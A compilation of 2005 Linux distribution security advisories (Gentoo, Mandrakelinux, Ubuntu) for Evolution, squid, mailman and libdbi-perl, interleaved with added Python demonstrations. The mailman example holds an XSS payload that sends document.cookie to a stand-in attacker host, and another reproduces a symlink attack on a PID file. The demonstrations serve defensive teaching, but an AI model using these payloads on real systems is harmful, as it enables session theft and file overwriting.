Resolution

All Evolution users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/evolution-2.0.2-r1"

References

[ 1 ] CAN-2005-0102

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0102

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-35.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


Mandrakelinux

Mandrakelinux Security Update Advisory


Package name: squid
Advisory ID: MDKSA-2005:014
Date: January 24th, 2005
Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1, Corporate Server 3.0


Problem Description:

"infamous41md" discovered two vulnerabilities in the squid proxy cache server. The first is a buffer overflow in the Gopher response parser which leads to memory corruption and would usually crash squid (CAN-2005-0094). The second is an integer overflow in the receiver of WCCP (Web Cache Communication Protocol) messages. An attacker could send a specially crafted UDP datagram that would cause squid to crash (CAN-2005-0095).

The updated packages have been patched to prevent these problems.


References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0095
http://www.squid-cache.org/Advisories/SQUID-2005_1.txt
http://www.squid-cache.org/Advisories/SQUID-2005_2.txt


Updated Packages:

Mandrakelinux 10.0:
829a39d43e630ea5723714a6914fb714 10.0/RPMS/squid-2.5.STABLE4-2.3.100mdk.i586.rpm
c2cb0554ab7225eef74bef946ffe359d 10.0/SRPMS/squid-2.5.STABLE4-2.3.100mdk.src.rpm

Mandrakelinux 10.0/AMD64:
01d6b3dfa7dc5dd5cf1a95c14492f18c amd64/10.0/RPMS/squid-2.5.STABLE4-2.3.100mdk.amd64.rpm
c2cb0554ab7225eef74bef946ffe359d amd64/10.0/SRPMS/squid-2.5.STABLE4-2.3.100mdk.src.rpm

Mandrakelinux 10.1:
59493538203620d5bcaabaa23d601446 10.1/RPMS/squid-2.5.STABLE6-2.2.101mdk.i586.rpm
e54c318ee8ec23a28f7ab799e7caad33 10.1/SRPMS/squid-2.5.STABLE6-2.2.101mdk.src.rpm

Mandrakelinux 10.1/X86_64:
f11e4cc06bcface8d67e8505eaa96723 x86_64/10.1/RPMS/squid-2.5.STABLE6-2.2.101mdk.x86_64.rpm
e54c318ee8ec23a28f7ab799e7caad33 x86_64/10.1/SRPMS/squid-2.5.STABLE6-2.2.101mdk.src.rpm

Corporate Server 2.1:
a42ac4049889e5b7123be68f65784f79 corporate/2.1/RPMS/squid-2.4.STABLE7-2.3.C21mdk.i586.rpm
dfc6cc283c301c3f4495e3a8f7ddcd63 corporate/2.1/SRPMS/squid-2.4.STABLE7-2.3.C21mdk.src.rpm

Corporate Server 2.1/x86_64:
903517606084ab4d37e2a52506eed1a5 x86_64/corporate/2.1/RPMS/squid-2.4.STABLE7-2.3.C21mdk.x86_64.rpm
dfc6cc283c301c3f4495e3a8f7ddcd63 x86_64/corporate/2.1/SRPMS/squid-2.4.STABLE7-2.3.C21mdk.src.rpm

Corporate Server 3.0:
c3567af5bc3b38291199904d81165879 corporate/3.0/RPMS/squid-2.5.STABLE4-2.3.C30mdk.i586.rpm
89d53797c271b1897f775d75c4bb4b9e corporate/3.0/SRPMS/squid-2.5.STABLE4-2.3.C30mdk.src.rpm

Mandrakelinux 9.2:
b200e4cd5136b605665675c22a07f8f6 9.2/RPMS/squid-2.5.STABLE3-3.5.92mdk.i586.rpm
3ad2ffec1411fae0708f4f3e00505fa3 9.2/SRPMS/squid-2.5.STABLE3-3.5.92mdk.src.rpm

Mandrakelinux 9.2/AMD64:
e3eff312ad7b514582575f076f26e5fb amd64/9.2/RPMS/squid-2.5.STABLE3-3.5.92mdk.amd64.rpm
3ad2ffec1411fae0708f4f3e00505fa3 amd64/9.2/SRPMS/squid-2.5.STABLE3-3.5.92mdk.src.rpm


To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandrakelinux at:

http://www.mandrakesoft.com/security/advisories

If you want to report vulnerabilities, please contact

security@linux-mandrake.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team <security@linux-mandrake.com>


Mandrakelinux Security Update Advisory


Package name: mailman
Advisory ID: MDKSA-2005:015
Date: January 24th, 2005
Affected versions: 10.0, 10.1, Corporate Server 2.1, Corporate Server 3.0


Problem Description:

Florian Weimer discovered a vulnerability in Mailman, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input is not properly sanitised by "scripts/driver" when returning error pages. This can be exploited to execute arbitrary HTML or script code in a user's browser session in the context of a vulnerable site by tricking the user into visiting a malicious web site or following a specially crafted link (CAN-2004-1177).
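The flaw described above, reflected cross-site scripting in an error page, shown as a minimal renderer in Python with the unescaped and escaped versions side by side. This is an added example and not Mailman's scripts/driver: error_page_insecure, error_page_safe and contains_live_script are my names, and EVIL_PATH is a constructed attacker input.

```python
"""Reflected XSS in an error page, the bug class reported against Mailman's
scripts/driver (CAN-2004-1177).  Added example; not Mailman's code."""
import html

# Constructed attacker input: a request path that a buggy error page echoes back.
EVIL_PATH = (
    '/mailman/listinfo/<script>document.location='
    '"http://evil.example/?"+document.cookie</script>'
)


def error_page_insecure(path, message):
    """Vulnerable: the request path is interpolated straight into the HTML,
    so whatever markup the attacker put in the link runs in the victim's
    browser with the vulnerable site's origin."""
    return (
        "<html><head><title>Bug in Mailman</title></head><body>"
        f"<h1>{message}</h1>"
        f"<p>Request: {path}</p>"
        "</body></html>"
    )


def error_page_safe(path, message):
    """Hardened: every untrusted value is HTML-escaped for body context.
    quote=True also escapes ' and ", so the same helper is safe inside
    attribute values."""
    return (
        "<html><head><title>Bug in Mailman</title></head><body>"
        f"<h1>{html.escape(message, quote=True)}</h1>"
        f"<p>Request: {html.escape(path, quote=True)}</p>"
        "</body></html>"
    )


def contains_live_script(page):
    """Demonstration check: is a raw, un-escaped <script> tag present?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("insecure page executes script:", contains_live_script(error_page_insecure(EVIL_PATH, "Error")))
    print("safe page executes script:    ", contains_live_script(error_page_safe(EVIL_PATH, "Error")))
```

html.escape is the right tool for HTML body and attribute context only; a value placed inside a script block or a URL needs that context's own encoding, and the error page should be served with an explicit charset so the browser cannot be steered into interpreting the bytes differently.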


References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1177


Updated Packages:

Mandrakelinux 10.0:
ae373070860eb1c736fcf66fd2c55d96 10.0/RPMS/mailman-2.1.4-2.2.100mdk.i586.rpm
fec2dfd480fc02b17ccff70dd99b4db7 10.0/SRPMS/mailman-2.1.4-2.2.100mdk.src.rpm

Mandrakelinux 10.0/AMD64:
e8b98f2b51d9f11b87bc0a0391d44099 amd64/10.0/RPMS/mailman-2.1.4-2.2.100mdk.amd64.rpm
fec2dfd480fc02b17ccff70dd99b4db7 amd64/10.0/SRPMS/mailman-2.1.4-2.2.100mdk.src.rpm

Mandrakelinux 10.1:
8dd23a3f24902dfd6c79bf86607652fb 10.1/RPMS/mailman-2.1.5-7.2.101mdk.i586.rpm
60d219904e0b21f46b6d2867d6f180bb 10.1/SRPMS/mailman-2.1.5-7.2.101mdk.src.rpm

Mandrakelinux 10.1/X86_64:
0f6eef6e7475e333a44b6dbead106f64 x86_64/10.1/RPMS/mailman-2.1.5-7.2.101mdk.x86_64.rpm
60d219904e0b21f46b6d2867d6f180bb x86_64/10.1/SRPMS/mailman-2.1.5-7.2.101mdk.src.rpm

Corporate Server 2.1:
6dcfa5a401a8e7fc76a539a62374e18f corporate/2.1/RPMS/mailman-2.0.14-1.2.C21mdk.i586.rpm
ceef33d5629e03e18760f8c001956664 corporate/2.1/SRPMS/mailman-2.0.14-1.2.C21mdk.src.rpm

Corporate Server 2.1/x86_64:
0205dc5fd874578803b487dd58baad5e x86_64/corporate/2.1/RPMS/mailman-2.0.14-1.2.C21mdk.x86_64.rpm
ceef33d5629e03e18760f8c001956664 x86_64/corporate/2.1/SRPMS/mailman-2.0.14-1.2.C21mdk.src.rpm

Corporate Server 3.0:
6ba4581b2060d821d0d95b780fc80f16 corporate/3.0/RPMS/mailman-2.1.4-2.2.C30mdk.i586.rpm
cfaf275a70905bede0d23767dbe1be25 corporate/3.0/SRPMS/mailman-2.1.4-2.2.C30mdk.src.rpm




Ubuntu Linux


Ubuntu Security Notice USN-70-1 January 25, 2005
libdbi-perl vulnerabilities
CAN-2005-0077

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libdbi-perl

The problem can be corrected by upgrading the affected package to version 1.42-3ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Javier Fernández-Sanguino Peña from the Debian Security Audit Project discovered that the module DBI::ProxyServer in Perl's DBI library created a PID file in an insecure manner. This could allow a symbolic link attack to create or overwrite arbitrary files with the privileges of the user invoking a program that uses this module (such as 'dbiproxy').

The module no longer creates such a PID file by default.

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1.diff.gz
Size/MD5: 13840 0ea63225d70126bd2492516466a2209d
http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1.dsc
Size/MD5: 608 f6a5286d0a38572cd3ff944669ecf457
http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42.orig.tar.gz
Size/MD5: 348167 ca8c8a1a4797d98121b41c1d0a5b3b7c

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1_amd64.deb
Size/MD5: 575324 487ed69858f7a4d6b0bc4810ea9b99ec

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1_i386.deb
Size/MD5: 573900 eb99ce7af5c6c89bdc969210107807ae

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1_powerpc.deb
Size/MD5: 577426 58c6f55a93ba0081a0737d16449a0dc8
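The bug class behind DSA 658-1 and USN-70-1 above (a PID file created at a predictable path with no guard against a pre-planted symbolic link), reproduced as a short Python demonstration so the attack and the fix can be run end to end. This is an added example and not DBI::ProxyServer's Perl code: write_pidfile_insecure, write_pidfile_safe and symlink_attack are names I chose, and the temporary directory, the victim file and the dbiproxy.pid path are constructed for the demonstration.

```python
"""Insecure PID-file creation (the pattern behind CAN-2005-0077) and a
symlink-safe replacement.  Added example; not DBI::ProxyServer's own code."""
import errno
import os
import tempfile


def write_pidfile_insecure(path):
    """Vulnerable: open(path, 'w') follows a symlink and truncates whatever it
    points at.  An attacker who can predict `path` (e.g. /tmp/dbiproxy.pid)
    plants a symlink there pointing at a file owned by the victim user."""
    with open(path, "w") as f:
        f.write(f"{os.getpid()}\n")


def write_pidfile_safe(path):
    """Hardened: create-only (O_EXCL) and never follow a symlink (O_NOFOLLOW).
    If anything already sits at `path`, the open fails instead of clobbering it.
    Returns True on success, False if the path was already occupied."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
    flags |= getattr(os, "O_NOFOLLOW", 0)  # not present on every platform
    try:
        fd = os.open(path, flags, 0o644)
    except OSError as e:
        if e.errno in (errno.EEXIST, errno.ELOOP):
            return False
        raise
    with os.fdopen(fd, "w") as f:
        f.write(f"{os.getpid()}\n")
    return True


def symlink_attack(writer):
    """Run `writer` against a planted symlink in a private directory and
    return the victim file's content afterwards (constructed scenario)."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.txt")
        with open(victim, "w") as f:
            f.write("important data\n")
        pidfile = os.path.join(d, "dbiproxy.pid")  # the predictable path
        os.symlink(victim, pidfile)                 # attacker's pre-planted link
        try:
            writer(pidfile)
        except OSError:
            pass
        with open(victim) as f:
            return f.read()


if __name__ == "__main__":
    print("insecure writer, victim now:", repr(symlink_attack(write_pidfile_insecure)))
    print("safe writer, victim now:    ", repr(symlink_attack(write_pidfile_safe)))
```

O_CREAT|O_EXCL is atomic, so there is no check-then-open window, and POSIX requires the open to fail with EEXIST when the path is a symlink even before O_NOFOLLOW is considered. What remains is denial of service (an attacker who pre-creates the file keeps the daemon from recording its PID), which is why the Ubuntu fix of not writing the file unless asked is the simplest answer, and why a PID file belongs in a directory only the service can write to rather than a shared /tmp.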